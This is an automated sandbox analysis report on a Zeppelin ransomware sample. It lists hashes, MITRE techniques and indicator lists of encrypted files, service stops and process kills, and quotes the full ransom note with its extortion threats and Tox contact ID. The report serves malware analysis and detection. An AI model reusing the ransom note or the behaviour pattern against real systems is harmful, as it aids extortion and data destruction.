zeppelin | a2ef8ef7be1ef11158f7d406e96c240178068b9692ec5e5ce19f9239345ee825

Analysis

max time kernel
92s
max time network
124s
platform
windows10-2004_x64
resource
win10v2004-20240221-en
resource tags

arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
submitted
26-02-2024 17:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
Size

227KB
MD5

b2a478d698a2789ce04d8d54158a7d64
SHA1

49cf775b235dd75dde60a70af385fff93a665e9c
SHA256

a2ef8ef7be1ef11158f7d406e96c240178068b9692ec5e5ce19f9239345ee825
SHA512

6b9b62d1f0610fff7cd79fb10e44a50739405043d168ca240a7bde22eea231ed74f20d77a99b2fe1d65f14581463d0fc0ca61e9fc54ca9e9c6b8ab23d7c746eb
SSDEEP

6144:eia1C9bP2XUJmcCvyr/2H64DQFu/U3buRKlemZ9DnGAefIC8+:eq9bP2Rfo/2a4DQFu/U3buRKlemZ9DnY

Score

10^/10

zeppelin evasion ransomware

Malware Config

Extracted

Path

C:\odt\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT

Ransom Note

All your files, including documents, databases, and other crucial data, have been encrypted. I've uploaded some databases and important files from your computers to the cloud. You have 48 hours to get in touch with us and reach an agreement. If you don't contact us by the end of this period, I'll release your data publicly on the dark web. This could damage your company and your partners. We're the only ones capable of restoring your files. To prove that we have a functional decryption tool, we're offering you the chance to decrypt one file for free. You can reach out to us through an anonymous chat. Just follow the provided instructions. 1. Visit https://tox.chat/download.html 2. Download uTox to your computer and launch it. 3. In the bottom left corner of the uTox client, enter my TOX ID A2C27B982A40B101994C392DB1D738D86544C56E1A80443671EE6F21DF4C49602AAB38420FE3 in the Search/Add Friends field. Then click the "+" button and select Add. 4. Please wait for a while, and I will add you. Once added, we can start communicating. Your personal ID: 2F6-A2A-068

URLs

https://tox.chat/download.html

Signatures

Detects Zeppelin payload 11 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3276-2-0x0000000000AD0000-0x0000000000C14000-memory.dmp	family_zeppelin
behavioral2/memory/3668-51-0x0000000000AD0000-0x0000000000C14000-memory.dmp	family_zeppelin
behavioral2/memory/3276-7607-0x0000000000AD0000-0x0000000000C14000-memory.dmp	family_zeppelin
behavioral2/memory/4280-9246-0x0000000000AD0000-0x0000000000C14000-memory.dmp	family_zeppelin
behavioral2/memory/4280-13772-0x0000000000AD0000-0x0000000000C14000-memory.dmp	family_zeppelin
behavioral2/memory/4280-15724-0x0000000000AD0000-0x0000000000C14000-memory.dmp	family_zeppelin
behavioral2/memory/4280-19235-0x0000000000AD0000-0x0000000000C14000-memory.dmp	family_zeppelin
behavioral2/memory/3276-22511-0x0000000000AD0000-0x0000000000C14000-memory.dmp	family_zeppelin
behavioral2/memory/4280-24295-0x0000000000AD0000-0x0000000000C14000-memory.dmp	family_zeppelin
behavioral2/memory/4280-28989-0x0000000000AD0000-0x0000000000C14000-memory.dmp	family_zeppelin
behavioral2/memory/3276-29019-0x0000000000AD0000-0x0000000000C14000-memory.dmp	family_zeppelin

Zeppelin Ransomware
Ransomware-as-a-service (RaaS) written in Delphi and first seen in 2019.
ransomware zeppelin
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Detects command variations typically used by ransomware 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\~temp001.bat	INDICATOR_SUSPICIOUS_GENRansomware

Renames multiple (6482) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489
Deletes itself 1 IoCs

Processes:

notepad.exe

pid process

1972 notepad.exe

pid	process
1972	notepad.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe

description	ioc	process
File opened (read-only)	\??\G:	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened (read-only)	\??\W:	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened (read-only)	\??\P:	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened (read-only)	\??\N:	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened (read-only)	\??\M:	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened (read-only)	\??\S:	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened (read-only)	\??\L:	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened (read-only)	\??\J:	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened (read-only)	\??\H:	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened (read-only)	\??\Z:	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened (read-only)	\??\Y:	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened (read-only)	\??\V:	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened (read-only)	\??\T:	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened (read-only)	\??\E:	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened (read-only)	\??\B:	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened (read-only)	\??\X:	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened (read-only)	\??\K:	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened (read-only)	\??\I:	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened (read-only)	\??\A:	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened (read-only)	\??\U:	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened (read-only)	\??\R:	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened (read-only)	\??\Q:	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened (read-only)	\??\O:	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe

Drops file in Program Files directory 64 IoCs

Processes:

2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe

description	ioc	process
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_O16EnterpriseVL_Bypass30-ul-oob.xrm-ms	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_MAK-ul-oob.xrm-ms	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\ja\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\BuildInfo.xml	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-cn\ui-strings.js	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\ui-strings.js.lock.2F6-A2A-068	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-150_contrast-white.png	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-60_contrast-black.png	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File created	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription4-ul-oob.xrm-ms	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageSmallTile.scale-150_contrast-white.png	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nl-nl\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\cs-cz\ui-strings.js.lock.2F6-A2A-068	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Retail-ul-phn.xrm-ms.lock.2F6-A2A-068	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\SplashScreen.scale-200.png	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_editpdf_18.svg	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected]	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\officeappguardwin32.exe.lock.2F6-A2A-068	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\DSMESSAGES.XML.lock.2F6-A2A-068	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\LISTS\1033\PHONE.XML.lock.2F6-A2A-068	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSmallTile.contrast-black_scale-100.png	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_radio_unselected_18.svg.lock.2F6-A2A-068	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\print_poster.png.lock.2F6-A2A-068	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SmallTile.scale-200_contrast-black.png	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-30_altform-unplated_contrast-black.png	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sl-si\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\legal\jdk\icu.md.lock.2F6-A2A-068	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\BRANDING.XML	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-down_32.svg.lock.2F6-A2A-068	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\css\main.css	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-80.png.lock.2F6-A2A-068	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\hu\msipc.dll.mui.lock.2F6-A2A-068	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\rsod\excelmui.msi.16.en-us.tree.dat	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File created	C:\Program Files\Microsoft Office\root\Office16\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteWideTile.scale-125.png	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-24_altform-unplated.png	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\ui-strings.js	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons_retina.png	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-gb\ui-strings.js	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\deploy\messages_ja.properties.lock.2F6-A2A-068	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.scale-100.png.lock.2F6-A2A-068	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TEXTCONV\WPFT632.CNV	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File created	C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\share.svg.lock.2F6-A2A-068	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\LocalBridge.exe	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-30_contrast-black.png	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\jfr.jar	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\CT_ROOTS.XML.lock.2F6-A2A-068	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-black_scale-140.png.lock.2F6-A2A-068	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\bg5.jpg	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SONORA\PREVIEW.GIF.lock.2F6-A2A-068	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageWideTile.scale-400_contrast-black.png	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File created	C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_neutral_split.scale-125_8wekyb3d8bbwe\microsoft.system.package.metadata\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\RTL\contrast-black\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SmallLogo.scale-200_contrast-black.png	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProVL_KMS_Client-ppd.xrm-ms	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_SubTest-ul-oob.xrm-ms	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarBadge.scale-400.png	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\GenericMailSmallTile.scale-150.png	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe

Drops file in Windows directory 1 IoCs

Processes:

2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe

description ioc process

File created C:\Windows\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe

description	ioc	process
File created	C:\Windows\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
3992	sc.exe
2408	sc.exe
412	sc.exe
3092	sc.exe
3980	sc.exe
4516	sc.exe
1108	sc.exe
4644	sc.exe
2420	sc.exe
916	sc.exe
3200	sc.exe
2252	sc.exe
3240	sc.exe
4572	sc.exe
936	sc.exe
4664	sc.exe
3892	sc.exe
4740	sc.exe
3892	sc.exe
4056	sc.exe
5084	sc.exe
2704	sc.exe
1564	sc.exe
1980	sc.exe
2428	sc.exe
392	sc.exe
4904	sc.exe
2176	sc.exe
4760	sc.exe
1452	sc.exe
4932	sc.exe
4356	sc.exe
1276	sc.exe
5072	sc.exe
3876	sc.exe
2032	sc.exe
3088	sc.exe
3020	sc.exe
2992	sc.exe
3908	sc.exe
4508	sc.exe
1796	sc.exe
1620	sc.exe
4332	sc.exe
2236	sc.exe
3652	sc.exe
928	sc.exe
2176	sc.exe
4336	sc.exe
4992	sc.exe
3192	sc.exe
2396	sc.exe
3036	sc.exe
4988	sc.exe
3396	sc.exe
4464	sc.exe
1672	sc.exe
3764	sc.exe
1668	sc.exe
1512	sc.exe
4848	sc.exe
4000	sc.exe
412	sc.exe
3104	sc.exe

Enumerates processes with tasklist 1 TTPs 6 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

5072 tasklist.exe
844 tasklist.exe
2584 tasklist.exe
3952 tasklist.exe
4356 tasklist.exe
1652 tasklist.exe

pid	process
5072	tasklist.exe
844	tasklist.exe
2584	tasklist.exe
3952	tasklist.exe
4356	tasklist.exe
1652	tasklist.exe

Kills process with taskkill 25 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
3120	taskkill.exe
3528	taskkill.exe
4564	taskkill.exe
4884	taskkill.exe
2772	taskkill.exe
3216	taskkill.exe
1940	taskkill.exe
1928	taskkill.exe
4836	taskkill.exe
2208	taskkill.exe
3040	taskkill.exe
1520	taskkill.exe
4896	taskkill.exe
4992	taskkill.exe
3196	taskkill.exe
2912	taskkill.exe
2976	taskkill.exe
2948	taskkill.exe
1212	taskkill.exe
4932	taskkill.exe
3016	taskkill.exe
4976	taskkill.exe
3244	taskkill.exe
4008	taskkill.exe
5032	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe

pid	process
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
